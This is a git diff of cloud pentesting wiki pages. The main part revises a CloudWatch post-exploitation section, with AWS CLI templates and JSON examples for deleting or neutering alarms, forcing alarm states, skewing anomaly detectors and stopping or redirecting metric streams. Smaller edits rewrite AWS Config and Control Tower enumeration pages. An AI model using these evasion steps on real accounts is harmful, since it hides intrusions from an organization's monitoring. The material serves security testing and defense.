+An attacker with these permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents.<sup>[[2]](#references)[[10]](#references)</sup>
 
-In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete.
+In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker could create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B and composite alarm B depends on composite alarm A. In this scenario, the composite alarms stop being evaluated and cannot be deleted until the dependency cycle is broken.<sup>[[16]](#references)</sup>
 
 ```bash
-aws cloudwatch put-metric-alarm --cli-input-json <value> | --alarm-name <value> --comparison-operator <value> --evaluation-periods <value> [--datapoints-to-alarm <value>] [--threshold <value>] [--alarm-description <value>] [--alarm-actions <value>] [--metric-name <value>] [--namespace <value>] [--statistic <value>] [--dimensions <value>] [--period <value>]
+aws cloudwatch put-metric-alarm --alarm-name <value> [--cli-input-json <value>] [--comparison-operator <value>] [--evaluation-periods <value>] [--datapoints-to-alarm <value>] [--threshold <value>] [--alarm-description <value>] [--alarm-actions <value>] [--metric-name <value>] [--namespace <value>] [--statistic <value>] [--dimensions <value>] [--period <value>]
 aws cloudwatch delete-alarms --alarm-names <value>
-aws cloudwatch put-composite-alarm --alarm-name <value> --alarm-rule <value> [--no-actions-enabled | --actions-enabled [--alarm-actions <value>] [--insufficient-data-actions <value>] [--ok-actions <value>] ]
+aws cloudwatch put-composite-alarm --alarm-name <value> --alarm-rule <value> [--actions-enabled | --no-actions-enabled] [--alarm-actions <value>] [--insufficient-data-actions <value>] [--ok-actions <value>]
 ```
 
 The following example shows how to make a metric alarm ineffective:
 
-- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic.
-- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm.
+- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds, and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic.<sup>[[10]](#references)[[26]](#references)</sup>
+- By modifying the threshold to more than 99%, setting the period to 10 seconds, the evaluation periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the datapoints to alarm to 8640 as well, it would be necessary for CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm.<sup>[[3]](#references)[[10]](#references)[[26]](#references)</sup>
+
+A 10-second period is intended for high-resolution custom metrics; a standard EC2 metric may not provide 10-second datapoints, in which case the modified alarm can remain in `INSUFFICIENT_DATA` and be ineffective.<sup>[[3]](#references)[[10]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Original Metric Alarm" }}
@@ -269,7 +279,7 @@ The following example shows how to make a metric alarm ineffective:
   "Dimensions": [
     {
       "Name": "InstanceId",
-      "Value": "i-0645d6d414dadf9f8"
+      "Value": "i-0645d6d414dadf9f80"
     }
   ],
   "AlarmActions": [],
@@ -279,8 +289,8 @@ The following example shows how to make a metric alarm ineffective:
   "Period": 10,
   "Statistic": "Average",
   "Threshold": 99,
-  "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
-  "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
+  "AlarmDescription": "CPU Utilization of i-0645d6d414dadf9f80 with 99% as threshold",
+  "AlarmName": "Instance i-0645d6d414dadf9f80 CPU Utilization"
 }
 ```
 
@@ -289,13 +299,13 @@ The following example shows how to make a metric alarm ineffective:
 
 **Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
 
-### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`**
+### **`cloudwatch:DisableAlarmActions`, `cloudwatch:EnableAlarmActions`, `cloudwatch:SetAlarmState`**
 
-By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response.
+By deleting or disabling alarm actions, an attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering Auto Scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behavior by reactivating previously disabled actions.<sup>[[2]](#references)[[10]](#references)</sup>
 
-In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures.
+In addition, an attacker with the permission could manipulate alarm states, creating false alarms to distract and confuse administrators or temporarily forcing a state that hides ongoing malicious activity or critical system failures.<sup>[[2]](#references)[[17]](#references)</sup>
 
-- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration.
+- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state, and it is also reevaluated if you update its configuration.<sup>[[17]](#references)</sup>
 
 ```bash
 aws cloudwatch disable-alarm-actions --alarm-names <value>
@@ -307,14 +317,14 @@ aws cloudwatch set-alarm-state --alarm-name <value> --state-value <OK | ALARM | 
 
 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`**
 
-An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring.
+An attacker would be able to compromise the ability to detect and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; by creating or modifying them, the attacker could misconfigure models or create false positives that distract or overwhelm the monitoring.<sup>[[2]](#references)[[11]](#references)[[18]](#references)</sup>
 
 ```bash
 aws cloudwatch delete-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value>]
 aws cloudwatch put-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value> --configuration <value> --metric-characteristics <value>]
 ```
 
-The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period.
+The following example shows how to make a metric anomaly detector ineffective. This detector monitors the average CPU utilization of a specific EC2 instance; adding `ExcludedTimeRanges` excludes the selected range from model training and updates. Choosing a range that covers relevant history can prevent the model from learning a useful baseline, rather than directly suppressing alarm evaluation.<sup>[[11]](#references)[[18]](#references)[[27]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Original Metric Anomaly Detector" }}
@@ -328,7 +338,7 @@ The following example shows how to make a metric anomaly detector ineffective. T
     "Dimensions": [
       {
         "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
+        "Value": "i-0123456789abcdef0"
       }
     ]
   }
@@ -348,18 +358,18 @@ The following example shows how to make a metric anomaly detector ineffective. T
     "Dimensions": [
       {
         "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
+        "Value": "i-0123456789abcdef0"
       }
     ]
   },
   "Configuration": {
     "ExcludedTimeRanges": [
       {
-        "StartTime": "2023-01-01T00:00:00Z",
-        "EndTime": "2053-01-01T23:59:59Z"
+        "StartTime": "2023-01-01T00:00:00",
+        "EndTime": "2053-01-01T23:59:59"
       }
     ],
-    "Timezone": "Europe/Madrid"
+    "MetricTimezone": "Europe/Madrid"
   }
 }
 ```
@@ -371,7 +381,7 @@ The following example shows how to make a metric anomaly detector ineffective. T
 
 ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`**
 
-An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities.
+An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying, or deleting its dashboards. These permissions could remove critical visibility into system performance and health, alter dashboards to display incorrect data, or hide malicious activities.<sup>[[2]](#references)[[8]](#references)</sup>
 
 ```bash
 aws cloudwatch delete-dashboards --dashboard-names <value>
@@ -380,9 +390,9 @@ aws cloudwatch put-dashboard --dashboard-name <value> --dashboard-body <value>
 
 **Potential Impact**: Loss of monitoring visibility and misleading information.
 
-### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`**
+### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule`, `cloudwatch:PutManagedInsightRules`**
 
-Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team.
+Contributor Insights rules can generate time series and reports from log data or managed service metrics. By deleting existing rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. An attacker with `cloudwatch:PutInsightRule` or `cloudwatch:PutManagedInsightRules` could also create or enable rules that generate misleading data or expose sensitive contributor information.<sup>[[2]](#references)[[12]](#references)[[28]](#references)</sup>
 
 ```bash
 aws cloudwatch delete-insight-rules --rule-names <value>
@@ -394,7 +404,7 @@ aws cloudwatch put-managed-insight-rules --managed-rules <value>
 
 ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`**
 
-By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity.
+By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, enabling or configuring misleading rules could generate noise or hide malicious activity.<sup>[[2]](#references)[[12]](#references)</sup>
 
 ```bash
 aws cloudwatch disable-insight-rules --rule-names <value>
@@ -405,13 +415,12 @@ aws cloudwatch enable-insight-rules --rule-names <value>
 
 ### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`**
 
-An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity:
+An attacker with the **`cloudwatch:DeleteMetricStream`** or **`cloudwatch:PutMetricStream`** permission could create, modify, or delete metric streams, compromising downstream monitoring and metric confidentiality. A newly created stream can route selected metrics through a configured Firehose delivery stream to an S3 or third-party destination, subject to the required Firehose role and permissions.<sup>[[2]](#references)[[9]](#references)[[25]](#references)</sup>
 
-- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations.
-- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues.
-- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden.
+- **Create malicious streams**: Create metric streams to send selected metrics to unauthorized destinations.<sup>[[9]](#references)[[25]](#references)</sup>
+- **Monitoring disruption**: Deleting metric streams would disrupt the continuous flow of monitoring data and could hide malicious activity.<sup>[[9]](#references)[[20]](#references)</sup>
 
-Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless.
+With the **`cloudwatch:PutMetricData`** permission, an attacker can publish custom metric data to a namespace. If a metric stream's filters include that metric, the new data can be exported through the stream; flooding a namespace can add noise, affect dependent alarms, and increase monitoring costs.<sup>[[2]](#references)[[9]](#references)[[19]](#references)[[29]](#references)</sup>
 
 ```bash
 aws cloudwatch delete-metric-stream --name <value>
@@ -422,14 +431,14 @@ aws cloudwatch put-metric-data --namespace <value> [--metric-data <value>] [--me
 Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance:
 
 ```bash
-aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg"
+aws cloudwatch put-metric-data --namespace "Custom/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdef0"
 ```
 
 **Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams.
 
 ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`**
 
-An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams.
+An attacker with **`cloudwatch:StopMetricStreams`** or **`cloudwatch:StartMetricStreams`** could control the flow of affected metric streams. Stopping a stream pauses delivery without deleting it, and data published while it is stopped is not backfilled after restart; this can hide activity from downstream monitoring.<sup>[[2]](#references)[[20]](#references)</sup>
 
 ```bash
 aws cloudwatch stop-metric-streams --names <value>
@@ -440,7 +449,7 @@ aws cloudwatch start-metric-streams --names <value>
 
 ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags.
+An attacker would be able to add, modify, or remove tags from supported CloudWatch resources, including alarms, dashboards, datasets, insight rules, metric streams, services, and SLOs. This could disrupt organization access-control policies that use request or resource tags.<sup>[[2]](#references)</sup>
 
 ```bash
 aws cloudwatch tag-resource --resource-arn <value> --tags <value>
@@ -451,12 +460,36 @@ aws cloudwatch untag-resource --resource-arn <value> --tag-keys <value>
 
 ## References
 
-- [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info)
-- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html)
-- [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric)
+- [1] [CloudWatch - CloudSecDocs](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info)
+- [2] [Actions, resources, and condition keys for Amazon CloudWatch - Service Authorization Reference](https://docs.aws.amazon.com/service-authorization/latest/reference/list_cloudwatch.html)
+- [3] [Conceptos de métricas - Amazon CloudWatch](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric)
+- [4] [What is Amazon CloudWatch? - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html)
+- [5] [CloudWatch Logs quotas - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/cloudwatch_limits_cwl.html)
+- [6] [Sending events to CloudWatch Logs - AWS CloudTrail](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html)
+- [7] [Filter pattern syntax for metric filters, subscription filters, filter log events, and Live Tail - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
+- [8] [Using Amazon CloudWatch dashboards - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Dashboards.html)
+- [9] [Use metric streams - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-Metric-Streams.html)
+- [10] [Using Amazon CloudWatch alarms - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Alarms.html)
+- [11] [Create a CloudWatch alarm based on anomaly detection - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_Anomaly_Detection_Alarm.html)
+- [12] [Use Contributor Insights to analyze high-cardinality data - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/ContributorInsights.html)
+- [13] [Amazon CloudWatch Logs concepts - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/CloudWatchLogsConcepts.html)
+- [14] [Basic monitoring and detailed monitoring in CloudWatch - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/cloudwatch-metrics-basic-detailed.html)
+- [15] [Install the CloudWatch agent using AWS Systems Manager - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/installing-cloudwatch-agent-ssm.html)
+- [16] [Create a composite alarm - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_Composite_Alarm.html)
+- [17] [SetAlarmState - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_SetAlarmState.html)
+- [18] [PutAnomalyDetector - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_PutAnomalyDetector.html)
+- [19] [PutMetricData - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_PutMetricData.html)
+- [20] [Metric stream operation and maintenance - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch-metric-streams-operation.html)
+- [21] [EventBridge is the evolution of Amazon CloudWatch Events - Amazon EventBridge](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-cwe-now-eb.html)
+- [22] [What Is Amazon EventBridge? - Amazon EventBridge](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-what-is.html)
+- [23] [What is Amazon CloudWatch Logs? - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/WhatIsCloudWatchLogs.html)
+- [24] [Prerequisites - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/prerequisites.html)
+- [25] [put-metric-stream - AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudwatch/put-metric-stream.html)
+- [26] [put-metric-alarm - AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudwatch/put-metric-alarm.html)
+- [27] [put-anomaly-detector - AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudwatch/put-anomaly-detector.html)
+- [28] [Condition keys for Contributor Insights log group access - Amazon CloudWatch](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/iam-cw-condition-keys-contributor.html)
+- [29] [put-metric-data - AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudwatch/put-metric-data.html)
+- [30] [Log group-level subscription filters - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/SubscriptionFilters.html)
+- [31] [Actions, resources, and condition keys for Amazon CloudWatch - legacy URL](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
@@ -1,50 +1,58 @@
 # AWS - Config Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS Config
 
-AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**.
+AWS Config records configuration changes for supported resource types in scope as configuration items (CIs). A customer-managed configuration recorder is scoped to an AWS account and Region; by default, it records supported resources in the Region where AWS Config is running, subject to resource coverage and recording settings.<sup>[[1]](#references)[[2]](#references)</sup>
 
-A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
+A configuration item (CI) is a point-in-time view of a supported resource's attributes, relationships, and other metadata. AWS Config creates a CI when it detects a change to a recorded resource, and can also create one at the recording frequency selected for that resource type. A change can also cause updated CIs for directly related resources to be recorded.<sup>[[1]](#references)[[3]](#references)</sup>
 
-- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
-- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
-- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
-- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
-- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
+- **Metadata**: Contains details about the CI, including its version ID, capture time, capture status, and state ID, which indicates the ordering of CIs for a resource. In configuration item version 1.3, the `configurationItemMD5Hash` field is empty, so use the configuration state ID to ensure that you have the latest CI.<sup>[[3]](#references)</sup>
+- **Attributes**: Contains resource attributes such as the resource ID, key-value tags, resource type, ARN, availability zone (when applicable), and creation time.<sup>[[3]](#references)</sup>
+- **Relationships**: Describes relationships with other resources. For example, a CI can describe an EBS volume attached to an EC2 instance; supported EC2 relationships also include network interfaces, Elastic IPs, VPCs, and subnets.<sup>[[3]](#references)[[11]](#references)</sup>
+- **Current configuration:** Contains information returned by the resource's Describe or List API. AWS Config uses those same API calls to capture configuration details for resources and related resources.<sup>[[1]](#references)[[3]](#references)</sup>
+- **Related events**: Although related events are listed as a CI component, AWS documents that the `relatedEvents` field is empty as of configuration item version 1.3. Use CloudTrail's `LookupEvents` API to retrieve events for the resource instead of relying on a CloudTrail event ID in the CI.<sup>[[3]](#references)</sup>
 
-**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
+**Configuration History**: A configuration history is a collection of CIs for a resource over a chosen time period. AWS Config automatically delivers a JSON history file for each recorded resource type to the specified Amazon S3 bucket every six hours when changes occurred during that period.<sup>[[1]](#references)[[4]](#references)</sup>
 
-**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
+**Configuration Streams**: A configuration stream is an automatically updated list of CIs for recorded resources, delivered through an Amazon SNS topic. It can be used to observe changes, generate notifications, or update external systems.<sup>[[4]](#references)</sup>
 
-**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
+**Configuration Snapshots**: A configuration snapshot is a point-in-time collection of CIs for the supported resources being recorded in an account. AWS Config generates one on request through the `DeliverConfigSnapshot` API action or the `deliver-config-snapshot` AWS CLI command, and stores it in the specified S3 bucket.<sup>[[1]](#references)[[4]](#references)</sup>
 
-**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
+**S3 is used to store** configuration history files and snapshots in the bucket specified by the AWS Config delivery channel. A central bucket can receive deliveries from multiple AWS accounts, but its policy must grant the required permissions to each source account's configuration-recorder role; when using service-linked recorders, AWS Config uses the `config.amazonaws.com` service principal and needs permission to write objects.<sup>[[5]](#references)</sup>
 
 ### Functioning
 
-- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config
-- Stores everything in S3 bucket
-- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings
-- Lambda feeds back to Config
-- If rule has been broken, Config fires up an SNS
+- When changes occur—for example, when a security-group rule is removed or a bucket ACL changes—AWS Config detects them, queries the resource and related resources, and records CIs.<sup>[[1]](#references)[[11]](#references)</sup>
+- Stores configuration history files and on-demand snapshots in the specified S3 bucket, and sends configuration stream notifications through SNS.<sup>[[1]](#references)[[4]](#references)</sup>
+- Depending on the rule, a configuration change can trigger an evaluation, or a periodic evaluation can invoke the rule's evaluation logic.<sup>[[1]](#references)[[6]](#references)</sup>
+- A custom Lambda rule returns the compliance result to AWS Config.<sup>[[1]](#references)</sup>
+- If a resource violates a rule, AWS Config marks the resource and rule as noncompliant; when the compliance status changes, Config sends an SNS notification.<sup>[[1]](#references)</sup>
 
 ![AWS Config functioning diagram showing events flowing through Config rules to event targets and investigation](<../../../../images/image (126).png>)
 
 ### Config Rules
 
-Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
+Config rules help **evaluate specific compliance checks** **and controls across your resources** by determining whether resource configurations match desired settings. Managed rules are predefined and customizable rules created by AWS; custom rules can be implemented with Lambda or Guard. For detective evaluation, AWS Config checks matching recorded resources after configuration changes, periodically, or both, depending on the rule's trigger configuration.<sup>[[4]](#references)[[6]](#references)</sup>\
+AWS provides **predefined rules** for common security checks. For example, `rds-storage-encrypted` checks whether storage encryption is enabled for Amazon RDS DB instances, while `encrypted-volumes` checks whether attached Amazon EBS volumes are encrypted (and can optionally require a specific KMS key).<sup>[[7]](#references)[[8]](#references)</sup>
 
-- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
-- **Custom rules**: You can create your own rules to check specific customconfigurations.
+- **AWS Managed rules**: A set of predefined rules that cover many common best practices, so browse these rules before creating your own because an equivalent rule may already exist.<sup>[[4]](#references)</sup>
+- **Custom rules**: Rules that you create from scratch with AWS Lambda or Guard to check custom configurations.<sup>[[4]](#references)</sup>
 
-Limit of 50 config rules per region before you need to contact AWS for an increase.\
-Non compliant results are NOT deleted.
+The current limit is 1,000 AWS Config rules per account per Region, and AWS marks this quota as not increaseable.<sup>[[9]](#references)</sup>\
+Evaluation results can be explicitly deleted and then recomputed; after an evaluation is deleted, it cannot be retrieved.<sup>[[10]](#references)</sup>
+
+## References
+
+- [1] [How AWS Config Works](https://docs.aws.amazon.com/config/latest/developerguide/how-does-config-work.html)
+- [2] [Recording AWS Resources with AWS Config](https://docs.aws.amazon.com/config/latest/developerguide/select-resources.html)
+- [3] [Components of a Configuration Item](https://docs.aws.amazon.com/config/latest/developerguide/config-item-table.html)
+- [4] [AWS Config terminology and concepts](https://docs.aws.amazon.com/config/latest/developerguide/config-concepts.html)
+- [5] [Permissions for the Amazon S3 Bucket for the AWS Config Delivery Channel](https://docs.aws.amazon.com/config/latest/developerguide/s3-bucket-policy.html)
+- [6] [Components of an AWS Config Rule](https://docs.aws.amazon.com/config/latest/developerguide/evaluate-config_components.html)
+- [7] [rds-storage-encrypted](https://docs.aws.amazon.com/config/latest/developerguide/rds-storage-encrypted.html)
+- [8] [encrypted-volumes](https://docs.aws.amazon.com/config/latest/developerguide/encrypted-volumes.html)
+- [9] [Service Limits for AWS Config](https://docs.aws.amazon.com/config/latest/developerguide/configlimits.html)
+- [10] [Deleting Evaluation Results from AWS Config Rules](https://docs.aws.amazon.com/config/latest/developerguide/deleting-evaluations-results.html)
+- [11] [Supported Resource Types for AWS Config](https://docs.aws.amazon.com/config/latest/developerguide/resource-config-reference.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
@@ -1,37 +1,37 @@
 # AWS - Control Tower Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Control Tower
 
 > [!NOTE]
-> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them.
+> In summary, Control Tower is a service that lets you define policies for all accounts in your organization; controls (formerly called guardrails) can apply to an organizational unit (OU) and the accounts it contains.<sup>[[1]](#references)[[2]](#references)</sup>
 
-AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS.
+AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS.<sup>[[1]](#references)</sup>
 
